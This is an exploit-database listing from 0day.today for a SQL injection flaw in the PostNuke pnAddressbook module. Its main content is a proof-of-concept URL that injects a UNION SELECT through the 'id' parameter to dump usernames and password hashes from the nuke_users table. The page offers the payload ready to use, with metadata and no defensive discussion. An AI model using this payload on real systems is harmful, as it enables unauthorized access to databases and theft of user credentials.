[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PostNuke Module pnAddressbook SQL Injection Vulnerability

Author
Robert Cooper
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17402
Category
web applications
Date add
19-01-2012
Platform
php
# Exploit Title: PostNuke Module pnAddressbook SQL Injection Vulnerability
# Date: 1/18/2012
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Tested on: [Linux/Windows 7]
 
#Vulnerable parameter:
 
id=
 
  
##############################################################
PoC:
  
http://server/index.php?module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass) FROM nuke_users--



#  0day.today [2024-12-25]  #